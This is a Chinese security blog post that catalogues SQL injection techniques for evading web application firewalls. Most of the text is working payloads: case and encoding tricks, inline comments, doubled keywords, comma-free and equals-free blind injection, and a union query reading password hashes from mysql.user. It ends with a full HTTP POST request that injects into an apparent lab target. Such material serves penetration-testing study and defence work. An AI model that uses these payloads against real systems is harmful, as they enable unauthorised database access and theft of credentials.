<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=2"/><meta name="theme-color" content="#222"/><meta http-equiv="X-UA-COMPATIBLE" content="IE=edge,chrome=1"/><meta name="renderer" content="webkit"/><link rel="icon" type="image/ico" sizes="32x32" href="/assets/favicon.ico"/><link rel="apple-touch-icon" sizes="180x180" href="/assets/apple-touch-icon.png"/><link rel="alternate" href="/rss.xml" title="云逸'bolg" type="application/rss+xml"><link rel="alternate" href="/atom.xml" title="云逸'bolg" type="application/atom+xml"><link rel="alternate" type="application/json" title="云逸'bolg" href="http://gyzero.shop/feed.json"/><link rel="preconnect" href="https://lf9-cdn-tos.bytecdntp.com"/><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"/><link rel="dns-prefetch" href="https://unpkg.com"/><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext"><link rel="stylesheet" href="/css/app.css?v=0.3.6"><script src="https://cdn.staticfile.org/vue/3.2.45/vue.global.prod.js"></script><link rel="canonical" href="http://gyzero.shop/2023/11/02/%E6%BC%8F%E6%B4%9E/sql%E6%B3%A8%E5%85%A5%E7%BB%95%E8%BF%87/"><title>sql注入绕过</title><meta name="generator" content="Hexo 6.3.0"></head><body itemscope itemtype="http://schema.org/WebPage"><div id="loading"><div class="cat"><div class="body"></div><div class="head"><div class="face"></div></div><div class="foot"><div class="tummy-end"></div><div class="bottom"></div><div class="legs left"></div><div class="legs right"></div></div><div class="paw"><div class="hands left"></div><div class="hands right"></div></div></div></div><div id="container"><header id="header" itemscope itemtype="http://schema.org/WPHeader"><div class="inner"><div id="brand"><div class="pjax"><h1 itemprop="name headline">sql注入绕过</h1><div class="meta"><span class="item" title="创建时间：2023-11-02 08:00:22"><span class="icon"><i class="ic i-calendar"></i></span><span class="text">发表于</span><time itemprop="dateCreated datePublished" datetime="2023-11-02T08:00:22+08:00">2023-11-02</time></span><span class="item" title="本文字数"><span class="icon"><i class="ic i-pen"></i></span><span class="text">本文字数</span><span>8.8k</span><span class="text">字</span></span><span class="item" title="阅读时长"><span class="icon"><i class="ic i-clock"></i></span><span class="text">阅读时长</span><span>8 分钟</span></span></div></div></div><nav id="nav"><div class="inner"><div class="toggle"><div class="lines" aria-label="切换导航栏"><span class="line"></span><span class="line"></span><span class="line"></span></div></div><ul class="menu"><li class="item title"><a href="/" rel="start">云逸'bolg</a></li></ul><ul class="right" id="rightNav"><li class="item theme" @click="changeThemeByBtn"><i class="ic" :class="{'i-sun': !themeStatus,'i-moon': themeStatus}"></i></li><li class="item search"><i class="ic i-search"></i></li></ul></div></nav></div><div class="pjax" id="imgs"><ul><li class="item" data-background-image="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/gyzero/tt.jpg"></li><li class="item" data-background-image="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/gyzero/hg.jpg"></li><li class="item" data-background-image="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/%E5%A3%81%E7%BA%B8/52.jpg"></li><li class="item" data-background-image="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/gyzero/33.jpg"></li><li class="item" data-background-image="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/%E5%A3%81%E7%BA%B8/45.jpg"></li><li class="item" data-background-image="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/gyzeromountains-artwork-2264498-wallhere.com.jpg"></li></ul></div></header><div id="waves"><svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto"><defs><path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z"></path></defs><g class="parallax"><use xlink:href="#gentle-wave" x="48" y="0"></use><use xlink:href="#gentle-wave" x="48" y="3"></use><use xlink:href="#gentle-wave" x="48" y="5"></use><use xlink:href="#gentle-wave" x="48" y="7"></use></g></svg></div><main><div class="inner"><div class="pjax" id="main"><div class="article wrap"><div class="breadcrumb" itemListElement itemscope itemtype="https://schema.org/BreadcrumbList"><i class="ic i-home"></i><span><a href="/">首页</a></span><i class="ic i-angle-right"></i><span itemprop="itemListElement" itemscope="itemscope" itemtype="https://schema.org/ListItem"><a href="/categories/network-security/" itemprop="item" rel="index" title="分类于网络安全"><span itemprop="name">网络安全<meta itemprop="position" content="0"/></span></a></span><i class="ic i-angle-right"></i><span class="current" itemprop="itemListElement" itemscope="itemscope" itemtype="https://schema.org/ListItem"><a href="/categories/network-security/web-security/" itemprop="item" rel="index" title="分类于web安全"><span itemprop="name">web安全<meta itemprop="position" content="1"/></span></a></span></div><article class="post block" itemscope="itemscope" itemtype="http://schema.org/Article" lang="zh-CN"><link itemprop="mainEntityOfPage" href="http://gyzero.shop/2023/11/02/%E6%BC%8F%E6%B4%9E/sql%E6%B3%A8%E5%85%A5%E7%BB%95%E8%BF%87/"/><span hidden="hidden" itemprop="author" itemscope="itemscope" itemtype="http://schema.org/Person"><meta itemprop="image" content="/assets/avatar.jpg"/><meta itemprop="name" content="云逸"/><meta itemprop="description" content=", "/></span><span hidden="hidden" itemprop="publisher" itemscope="itemscope" itemtype="http://schema.org/Organization"><meta itemprop="name" content="云逸'bolg"/></span><div class="body md" itemprop="articleBody"><p><span class="spoiler bulr" title="...">欢迎观看</span></p>
<h3 id="大小写绕过"><a class="markdownIt-Anchor" href="#大小写绕过">#</a> <span class="kbd">大小写绕过</span></h3>
<p class="rainbow">将字符串设置为大小写，例如</p>
<p class="rainbow">and 1=1 转成 AND 1=1 AnD 1= 1</p>
<p class="rainbow">select * from users where id=1 UNION SELECT 1,2,3,4</p>
<p class="rainbow">select * from users where id=1 UniON SelECT 1,2,3,4</p>
<h3 class="kbd" id="浮点数绕过注入"><a class="markdownIt-Anchor" href="#浮点数绕过注入">#</a> [浮点数绕过注入]</h3>
<p class="rainbow">select * from users where id=8E0union select 1,2,3,4; </p>
<p class="rainbow">select * from users where id=8.0union select  1,2,3,4</p>
<h3 id="null-值绕-过"><a class="markdownIt-Anchor" href="#null-值绕-过">#</a> <span class="kbd">NULL 值绕 过</span></h3>
<p class="rainbow">select \N;  \N 代表空</p>
<p class="rainbow">select * from users where id=\Nunion select 1,2,3,\N;</p>
<p class="rainbow">select * from users where id=\Nunion select 1,2,3,\Nfrom users; </p>
<h3 id="引号绕过"><a class="markdownIt-Anchor" href="#引号绕过">#</a> <span class="kbd">引号绕过  </span></h3>
<p class="rainbow">如果 waf 拦截过滤单引号的时候，可以使用双引号 在 mysql 里也可以用双引号作为字符串。</p>
<p class="rainbow">select * from users where id=‘1’;</p>
<p class="rainbow">select * from users where id=“1”; </p>
<p class="rainbow">也可以将字符串转换成 16 进制 再进行查询。</p>
<p class="rainbow">select hex(‘admin’); </p>
<p class="rainbow">select * from users where username=‘admin’;</p>
<p class="rainbow">select * from users where username=0x61646D696E; </p>
<p class="rainbow">如果 gpc 开启了，但是注入点是整形 也可以用 hex 十六进制进行绕过</p>
<p class="rainbow">select * from users where id=-1 union select 1,2,(select group_concat(column_name) from {.rainbow}information_schema.columns where TABLE_NAME=‘users’ limit 1),4;</p>
<p class="rainbow">select * from users where id=-1 union select 1,2,(select group_concat(column_name) from {.rainbow}information_schema.columns where TABLE_NAME=0x7573657273 limit 1),4;</p>
<p class="rainbow">可以看到存在整型注入的时候 没有用到单引号 所以可以注入</p>
<h3 id="添加库名绕过"><a class="markdownIt-Anchor" href="#添加库名绕过">#</a> <span class="kbd">添加库名绕过 </span></h3>
<p class="rainbow">以下两条查询语句，执行的结果是一致的，但是有些 waf 的拦截规则 并不会拦截 [库名].[表名] 这种模式。</p>
<p class="rainbow">select * from users where id=-1 union select 1,2,3,4 from users;</p>
<p class="rainbow">select * from users where id=-1 union select 1,2,3,4 from <span class="exturl" data-url="aHR0cDovL2FkbWluLnVz">admin.us</span> </p>
<p class="rainbow">mysql 中也可以添加库名查询表。例如跨库查询 mysql 库里的 usrs 表的内容。 select * from users where id=-1 union select 1,2,3,concat (user,authentication_string) from mysql.user;</p>
<h3 id="去重复绕过"><a class="markdownIt-Anchor" href="#去重复绕过">#</a> <span class="kbd">去重复绕过  </span></h3>
<p class="rainbow">在 mysql 查询可以使用 distinct 去除查询的重复值。可以利用这点突破 waf 拦截</p>
<p class="rainbow">select * from users where id=-1 union distinct select 1,2,3,4 from users;</p>
<p class="rainbow">select * from users where id=-1 union distinct select 1,2,3,version() from users; </p>
<h3 id="反引号绕过"><a class="markdownIt-Anchor" href="#反引号绕过">#</a> <span class="kbd">反引号绕过  </span></h3>
<p>在 mysql 可以使用  <code>这里是反引号</code>  绕过一些 waf 拦截。字段可以加反引号或者不加，意义相同。</p>
<p class="rainbow">insert into users(username,password,email)values(‘admin’,‘123456’,‘admin@admin.com’);</p>
<p class="rainbow">insert into users( <code>username</code> , <code>password</code> , <code>email</code> )values(‘admin’,‘123456’,‘admin@admin.com’); </p>
<h3 id="脚本语言特性绕过"><a class="markdownIt-Anchor" href="#脚本语言特性绕过">#</a> <span class="kbd">脚本语言特性绕过</span></h3>
<p class="rainbow">在 php 语言中 id=1&amp;id=2 后面的值会自动覆盖前面的值，不同的语言有不同的特性。可以利用这点绕过一 些 waf 的拦截。</p>
<p class="rainbow">id=1%00&amp;id=2 union select 1,2,3</p>
<p class="rainbow">有些 waf 会去匹配第一个 id 参数 1%00 %00 是截断字符，waf 会自动截断 从而不会检测后面的内容。到了 程序中 id 就是等于 id=2 union select 1,2,3 从绕过注入拦截。 其他语言特性 </p>
<p><img data-src="https://tuchuang-1309689803.cos.ap-nanjing.myqcloud.com/gyzero/jkjkjk.png" alt=""></p>
<h3 id="逗号绕过"><a class="markdownIt-Anchor" href="#逗号绕过">#</a> <span class="kbd">逗号绕过  </span></h3>
<p class="rainbow">目前有些防注入脚本都会逗号进行拦截，例如常规注入中必须包含逗号</p>
<p class="rainbow">select * from users where id=1 union select 1,2,3,4;</p>
<p class="rainbow">一般会对逗号过滤成空 select * from users where id=1 union select 1 2 3 4; 这样 SQL 语句就会出错。 所以 可以不使用逗号进行 SQL </p>
<h4 id="substr-截取字符串"><a class="markdownIt-Anchor" href="#substr-截取字符串">#</a> <span class="kbd">substr 截取字符串</span></h4>
<p class="rainbow">select(substr(database() from 1 for 1));</p>
<p class="rainbow">查询当前库第一个字符 查询 m 等于 select (substr (database () from 1 for 1)) 页面返回正常</p>
<p class="rainbow">select * from users where id=1 and ‘m’=(select(substr(database() from 1 for 1)));</p>
<p class="rainbow">可以进一步优化 m 换成 hex 0x6D 这样就避免了单引号</p>
<p class="rainbow">select * from users where id=1 and 0x6D=(select(substr(database() from 1 for 1))); </p>
<h4 class="kbd" id="min-截取字符串"><a class="markdownIt-Anchor" href="#min-截取字符串">#</a> [min 截取字符串]</h4>
<p class="rainbow">这个 min 函数跟 substr 函数功能相同 如果 substr 函数被拦截或者过滤可以使用这个函数代替。</p>
<p class="rainbow">select mid (database () from 1 for 1); 这个方法如上。</p>
<p class="rainbow">select * from users where id=1 and ‘m’=(select(mid(database() from 1 for 1)));</p>
<p class="rainbow">select * from users where id=1 and 0x6D=(select(mid(database() from 1 for 1))); </p>
<h4 id="使用-join-绕过"><a class="markdownIt-Anchor" href="#使用-join-绕过">#</a> <span class="kbd">使用 join 绕过 </span></h4>
<p class="rainbow">使用 join 自连接两个表 union select 1,2 #等价于 union select * from (select 1) a join (select 2) b a 和 b 分别是表的别名</p>
<p class="rainbow">select * from users where id=-1 union select 1,2,3,4;</p>
<p class="rainbow">select * from users where id=-1 union select * from (select 1)a join (select 2)b join(select 3)c join(select 4)d;</p>
<p class="rainbow">select * from users where id=-1 union select * from (select 1)a join (select 2)b join(select user())c join(select 4)d;</p>
<p class="rainbow">可以看到这里也没有使用逗号，从而绕过 waf </p>
<h4 class="kbd" id="like-绕过"><a class="markdownIt-Anchor" href="#like-绕过">#</a> [like 绕过]</h4>
<p class="rainbow">使用 like 模糊查询 select user () like ‘% r%’; 模糊查询成功返回 1 否则返回 0 找到第一个字符后继续进行下一个字符匹配。从而找到所有的字符串 最后就是要查询的内容，这种 SQL 注 入语句也不会存在逗号。从而绕过 waf 拦截 </p>
<h4 id="limit-offset-绕过"><a class="markdownIt-Anchor" href="#limit-offset-绕过">#</a> <span class="kbd">limit offset 绕过 </span></h4>
<p class="rainbow">SQL 注入时，如果需要限定条目可以使用 limit 0,1 限定返回条目的数目 limit 0,1 返回条一条记录 如果 对逗号进行拦截时，可以使用 limit 1 默认返回第一条数据。也可以使用 limit 1 offset 0 从零开始返 回第一条记录，这样就绕过 waf </p>
<h3 class="kbd" id="or-and-xor-not-绕过"><a class="markdownIt-Anchor" href="#or-and-xor-not-绕过">#</a> [or and xor not 绕过]</h3>
<p class="rainbow">目前主流的 waf 都会对 id=1 and 1=2、id=1 or 1=2、id=0 or 1=2 id=0 xor 1=1 limit 1 、id=1 xor 1=2 对这些常见的 SQL 注入检测语句进行拦截。像 and 这些还有字符代替 字符如下 </p>
<p class="rainbow">and 等于 &amp;&amp;</p>
<p class="rainbow">or 等于 ||</p>
<p class="rainbow">not 等于！</p>
<p class="rainbow">xor 等于 |</p>
<p class="rainbow">所以可以转换成这样</p>
<p class="rainbow">id=1 and 1=1 等于 id=1 &amp;&amp; 1=1</p>
<p class="rainbow">id=1 and 1=2 等于 id=1 &amp;&amp; 1=2</p>
<p class="rainbow">id=1 or 1=1 等于 id=1 || 1=1</p>
<p class="rainbow">id=0 or 1=0 等于   id=0 || 1=0 </p>
<p class="rainbow">可以绕过一些 waf 拦截继续对注入点进行安全检测</p>
<p class="rainbow">也可以使用运算符号</p>
<p class="rainbow">id=1 &amp;&amp; 2=1+1</p>
<p class="rainbow">id=1 &amp;&amp;   2=1-1 </p>
<h3 id="ascii-字符对比绕过"><a class="markdownIt-Anchor" href="#ascii-字符对比绕过">#</a> <span class="kbd">ascii 字符对比绕过 </span></h3>
<p class="rainbow">许多 waf 会对 union select 进行拦截 而且通常比较变态，那么可以不使用联合查询注入，可以使用字符 截取对比法，进行突破。</p>
<p class="rainbow">select substring(user(),1,1);</p>
<p class="rainbow">select * from users where id=1 and substring(user(),1,1)=‘r’;</p>
<p class="rainbow">select * from users where id=1 and ascii(substring(user(),1,1))=114;</p>
<p class="rainbow">最好把’r’换成成 ascii 码 如果开启 gpc int 注入就不能用了。 可以看到构造得 SQL 攻击语句没有使用联合查询 (union select) 也可以把数据查询出来 </p>
<h3 class="kbd" id="等号绕过"><a class="markdownIt-Anchor" href="#等号绕过">#</a> [等号绕过]</h3>
<p class="rainbow">如果程序会对 = 进行拦截 可以使用 like rlike regexp 或者使用 &lt;或者&gt;</p>
<p class="rainbow">select * from users where id=1 and ascii(substring(user(),1,1))&lt;115;</p>
<p class="rainbow">select * from users where id=1 and ascii(substring(user(),1,1))&gt;115;</p>
<p class="rainbow">select * from users where id=1 and (select substring(user(),1,1)like ‘r%’);</p>
<p class="rainbow">select * from users where id=1 and (select substring(user(),1,1)rlike ‘r’) </p>
<p class="rainbow">select * from users where id=1 and 1=(select user() regexp ‘^r’);</p>
<p class="rainbow">select * from users where id=1 and 1=(select user() regexp ‘^a’);</p>
<p class="rainbow">regexp 后面是正则 </p>
<h3 class="kbd" id="双关键词绕过"><a class="markdownIt-Anchor" href="#双关键词绕过">#</a> [双关键词绕过]</h3>
<p class="rainbow">有些程序会对单词 union、 select 进行转空 但是只会转一次这样会留下安全隐患。 双关键字绕过（若删除掉第一个匹配的 union 就能绕过）</p>
<p class="rainbow">id=-1’UNIunionONSeLselectECT1,2,3–+ 到数据库里执行会变成 id=-1’UNION SeLECT1,2,3–+ 从而绕过注入 </p>
<h3 id="union-select-绕过"><a class="markdownIt-Anchor" href="#union-select-绕过">#</a> <span class="kbd">union select 绕过 </span></h3>
<p class="rainbow">目前不少 waf 都会使用都会对 union select 进行拦截 单个不拦截 一起就进行拦截。</p>
<p class="rainbow">针对单个关键词绕过 sel&lt;&gt;ect 程序过滤 &lt;&gt; 为空 脚本处理</p>
<p class="rainbow">sele/<strong>/ct 程序过滤 /</strong>/ 为空</p>
<p class="rainbow">/<em>!%53eLEct</em>/url 编码与内联注释</p>
<p class="rainbow">se%0blect 使用空格绕过</p>
<p class="rainbow">sele% ct 使用百分号绕过</p>
<p class="rainbow">%53eLEct 编码绕过</p>
<p class="rainbow">大小写</p>
<p class="rainbow">uNIoN sELecT 1,2</p>
<p class="rainbow">union all select 1,2</p>
<p class="rainbow">union DISTINCT select 1,2</p>
<p class="rainbow">null+UNION+SELECT+1,2</p>
<p class="rainbow">/<em>!union</em>//<em>!select</em>/1,2</p>
<p class="rainbow">union/<strong>/select/</strong>/1,2</p>
<p class="rainbow">and(select 1)=(Select 0xA<em>1000)/</em>!uNIOn*//<em>!SeLECt</em>/ 1,user() </p>
<p class="rainbow">/<em>!50000union</em>//<em>!50000select</em>/1,2</p>
<p class="rainbow">/<em>!40000union</em>//<em>!40000select</em>/1,2</p>
<p class="rainbow">%0aunion%0aselect 1,2</p>
<p class="rainbow">%250aunion%250aselect 1,2</p>
<p class="rainbow">%09union%09select 1,2</p>
<p class="rainbow">%0caunion%0cselect 1,2</p>
<p class="rainbow">%0daunion%0dselect 1,2</p>
<p class="rainbow">%0baunion%0bselect 1,2</p>
<p class="rainbow">%0d%0aunion%0d%0aselect 1,2</p>
<p class="rainbow">–+%0d%0aunion–+%0d%0aselect–+%0d%0a1,–+%0d%0a2 /<em>!12345union</em>//<em>!12345select</em>/1,2;</p>
<p class="rainbow">/<em> 中文</em> /union/<em> 中文</em> /select/<em> 中文</em> / 1,2;</p>
<p class="rainbow">/* <em>/union/</em> */select/ */1,2;</p>
<p class="rainbow">/<em>!union</em>//<em>!00000all</em>//<em>!00000select</em>/1,2 </p>
<h3 id="unicode-编码绕过"><a class="markdownIt-Anchor" href="#unicode-编码绕过">#</a> <span class="kbd">Unicode 编码绕过 </span></h3>
<p class="rainbow">形式：“\u” 或者是 “% u” 加上 4 位 16 进制 Unicode 码值。</p>
<p class="rainbow">iis 会自动进行识别这种编码 有部分 waf 并不会拦截这这种编码</p>
<p class="rainbow">-1 union select 1,user()</p>
<p class="rainbow">部分转码</p>
<p class="rainbow">-1 uni%u006fn sel%u0065ct 1,user()</p>
<p class="rainbow">全部转码 {.rainbow}% u002d% u0031% u0020% u0075% u006e% u0069% u006f% u006e% u0020% u0073% u0065% u006c% u0065% u0063% u0074% u 0020% u0031% u002c% u0075% u0073% u0065% u0072% u0028% u0029 </p>
<h3 id="url-编码绕过"><a class="markdownIt-Anchor" href="#url-编码绕过">#</a> <span class="kbd">url 编码绕过 </span></h3>
<p>在 iis 里会自动把 url 编码转换成字符串传到程序中执行。 例如 union select 可以转换成 u%6eion s%65lect  94</p>
<p class="rainbow">POST /06/vul/sqli/sqli_id.php</p>
<p class="rainbow">HTTP/1.1 Host: 192.168.0.165</p>
<p class="rainbow">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: {.rainbow}text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,<em>/</em>;q=0.8</p>
<p class="rainbow">Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</p>
<p class="rainbow">Accept-Encoding: gzip, deflate</p>
<p class="rainbow">Content-Type: application/x-www-form-urlencoded</p>
<p class="rainbow">Content-Length: 47</p>
<p class="rainbow">Origin: <span class="exturl" data-url="aHR0cDovLzE5Mi4xNjguMC4xNjU=">http://192.168.0.165</span></p>
<p class="rainbow">Connection: close Referer: <span class="exturl" data-url="aHR0cDovLzE5Mi4xNjguMC4xNjUvMDYvdnVsL3NxbGkvc3FsaV9pZC5waHA=">http://192.168.0.165/06/vul/sqli/sqli_id.php</span></p>
<p class="rainbow">Cookie: PHPSESSID=hk8r159en71pndlu3jvvphenn5</p>
<p class="rainbow">Upgrade-Insecure-Requests: 1</p>
<p class="rainbow">id=-1 union%25OAselect%25OA1,user()-- &amp;submit=1</p>
</div><footer><div class="meta"><span class="item"><span class="icon"><i class="ic i-calendar-check"></i></span><span class="text">更新于</span><time title="修改时间：2024-05-07 22:28:16" itemprop="dateModified" datetime="2024-05-07T22:28:16+08:00">2024-05-07</time></span></div><div class="reward"><button><i class="ic i-heartbeat"></i>赞赏</button><p>请我喝[茶]~(￣▽￣)~*</p><div id="qr"><div><img data-src="/assets/wechatpay.png" alt="云逸 微信支付"/><p>微信支付</p></div><div><img data-src="/assets/alipay.png" alt="云逸 支付宝"/><p>支付宝</p></div></div></div><div id="copyright"><ul><li class="author"><strong>本文作者：</strong>云逸<i class="ic i-at"><em>@</em></i>云逸'bolg</li><li class="link"><strong>本文链接：</strong><a href="http://gyzero.shop/2023/11/02/%E6%BC%8F%E6%B4%9E/sql%E6%B3%A8%E5%85%A5%E7%BB%95%E8%BF%87/" title="sql注入绕过">http://gyzero.shop/2023/11/02/漏洞/sql注入绕过/</a></li><li class="license"><strong>版权声明：</strong>本站所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" rel="noopener" target="_blank"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</a> 许可协议。转载请注明出处！</li></ul></div></footer></article></div><div class="post-nav"><div class="item left"><a href="/2023/11/01/%E6%BC%8F%E6%B4%9E/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/" rel="prev" itemprop="url" data-background-image="https:&#x2F;&#x2F;tuchuang-1309689803.cos.ap-nanjing.myqcloud.com&#x2F;gyzero&#x2F;8888.jpg" title="命令执行漏洞"><span class="type">上一篇</span><span class="category"><i class="ic i-flag"></i>web安全</span><h3>命令执行漏洞</h3></a></div><div class="item right"><a href="/2023/11/02/%E6%BC%8F%E6%B4%9E/sql%E6%B3%A8%E5%85%A5/" rel="next" itemprop="url" data-background-image="https:&#x2F;&#x2F;tuchuang-1309689803.cos.ap-nanjing.myqcloud.com&#x2F;gyzero&#x2F;tt.jpg" title="sql漏洞"><span class="type">下一篇</span><span class="category"><i class="ic i-flag"></i>web安全</span><h3>sql漏洞</h3></a></div></div></div><div id="sidebar"><div class="inner"><div class="panels"><div class="inner"><div class="contents panel pjax" data-title="文章目录"><ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%A4%A7%E5%B0%8F%E5%86%99%E7%BB%95%E8%BF%87"><span class="toc-number">1.</span> <span class="toc-text"> 大小写绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%B5%AE%E7%82%B9%E6%95%B0%E7%BB%95%E8%BF%87%E6%B3%A8%E5%85%A5"><span class="toc-number">2.</span> <span class="toc-text"> [浮点数绕过注入]</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#null-%E5%80%BC%E7%BB%95-%E8%BF%87"><span class="toc-number">3.</span> <span class="toc-text"> NULL 值绕 过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%BC%95%E5%8F%B7%E7%BB%95%E8%BF%87"><span class="toc-number">4.</span> <span class="toc-text"> 引号绕过  </span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%B7%BB%E5%8A%A0%E5%BA%93%E5%90%8D%E7%BB%95%E8%BF%87"><span class="toc-number">5.</span> <span class="toc-text"> 添加库名绕过 </span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%BB%E9%87%8D%E5%A4%8D%E7%BB%95%E8%BF%87"><span class="toc-number">6.</span> <span class="toc-text"> 去重复绕过  </span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%8D%E5%BC%95%E5%8F%B7%E7%BB%95%E8%BF%87"><span class="toc-number">7.</span> <span class="toc-text"> 反引号绕过  </span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%84%9A%E6%9C%AC%E8%AF%AD%E8%A8%80%E7%89%B9%E6%80%A7%E7%BB%95%E8%BF%87"><span class="toc-number">8.</span> <span class="toc-text"> 脚本语言特性绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%80%97%E5%8F%B7%E7%BB%95%E8%BF%87"><span class="toc-number">9.</span> <span class="toc-text"> 逗号绕过  </span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#substr-%E6%88%AA%E5%8F%96%E5%AD%97%E7%AC%A6%E4%B8%B2"><span class="toc-number">9.1.</span> <span class="toc-text"> substr 截取字符串</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#min-%E6%88%AA%E5%8F%96%E5%AD%97%E7%AC%A6%E4%B8%B2"><span class="toc-number">9.2.</span> <span class="toc-text"> [min 截取字符串]</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8-join-%E7%BB%95%E8%BF%87"><span class="toc-number">9.3.</span> <span class="toc-text"> 使用 join 绕过 </span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#like-%E7%BB%95%E8%BF%87"><span class="toc-number">9.4.</span> <span class="toc-text"> [like 绕过]</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#limit-offset-%E7%BB%95%E8%BF%87"><span class="toc-number">9.5.</span> <span class="toc-text"> limit offset 绕过 </span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#or-and-xor-not-%E7%BB%95%E8%BF%87"><span class="toc-number">10.</span> <span class="toc-text"> [or and xor not 绕过]</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ascii-%E5%AD%97%E7%AC%A6%E5%AF%B9%E6%AF%94%E7%BB%95%E8%BF%87"><span class="toc-number">11.</span> <span class="toc-text"> ascii 字符对比绕过 </span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AD%89%E5%8F%B7%E7%BB%95%E8%BF%87"><span class="toc-number">12.</span> <span class="toc-text"> [等号绕过]</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%8C%E5%85%B3%E9%94%AE%E8%AF%8D%E7%BB%95%E8%BF%87"><span class="toc-number">13.</span> <span class="toc-text"> [双关键词绕过]</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#union-select-%E7%BB%95%E8%BF%87"><span class="toc-number">14.</span> <span class="toc-text"> union select 绕过 </span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#unicode-%E7%BC%96%E7%A0%81%E7%BB%95%E8%BF%87"><span class="toc-number">15.</span> <span class="toc-text"> Unicode 编码绕过 </span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#url-%E7%BC%96%E7%A0%81%E7%BB%95%E8%BF%87"><span class="toc-number">16.</span> <span class="toc-text"> url 编码绕过 </span></a></li></ol></div><div class="related panel pjax" data-title="系列文章"><ul><li ><a href="/2023/05/08/%E6%BC%8F%E6%B4%9E/redis%E7%9B%B8%E5%85%B3%E6%BC%8F%E6%B4%9E/" rel="bookmark" title="redis相关漏洞">redis相关漏洞</a></li><li ><a href="/2023/10/30/%E6%BC%8F%E6%B4%9E/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/" rel="bookmark" title="文件包含漏洞">文件包含漏洞</a></li><li ><a href="/2023/11/01/%E6%BC%8F%E6%B4%9E/xss%E6%BC%8F%E6%B4%9E/" rel="bookmark" title="xss漏洞">xss漏洞</a></li><li ><a href="/2023/11/01/%E6%BC%8F%E6%B4%9E/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/" rel="bookmark" title="命令执行漏洞">命令执行漏洞</a></li><li ><a href="/2023/11/02/%E6%BC%8F%E6%B4%9E/sql%E6%B3%A8%E5%85%A5/" rel="bookmark" title="sql漏洞">sql漏洞</a></li><li  class="active"><a href="/2023/11/02/%E6%BC%8F%E6%B4%9E/sql%E6%B3%A8%E5%85%A5%E7%BB%95%E8%BF%87/" rel="bookmark" title="sql注入绕过">sql注入绕过</a></li><li ><a href="/2023/11/05/%E6%BC%8F%E6%B4%9E/csrf%E6%BC%8F%E6%B4%9E/" rel="bookmark" title="CSRF漏洞">CSRF漏洞</a></li><li ><a href="/2023/11/09/%E6%BC%8F%E6%B4%9E/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/" rel="bookmark" title="文件上传漏洞">文件上传漏洞</a></li><li ><a href="/2024/05/08/%E6%BC%8F%E6%B4%9E/ssrf%E6%BC%8F%E6%B4%9E/" rel="bookmark" title="ssrf漏洞">ssrf漏洞</a></li></ul></div><div class="overview panel" data-title="站点概览"><div class="author" itemprop="author" itemscope="itemscope" itemtype="http://schema.org/Person"><img class="image" itemprop="image" alt="云逸" data-src="/assets/avatar.jpg"/><p class="name" itemprop="name">云逸</p><div class="description" itemprop="description"></div></div><nav class="state"><div class="item posts"><a href="/archives/"><span class="count">39</span><span class="name">文章</span></a></div><div class="item categories"><a href="/categories/"><span class="count">11</span><span class="name">分类</span></a></div></nav><div class="social"><a href="https://gyzero1.github.io/" class="item github" rel="noopener" title="https:&#x2F;&#x2F;gyzero1.github.io&#x2F;" target="_blank"><i class="ic i-github"></i></a><a href="https://about.me/gyzero" class="item about" rel="noopener" title="https:&#x2F;&#x2F;about.me&#x2F;gyzero" 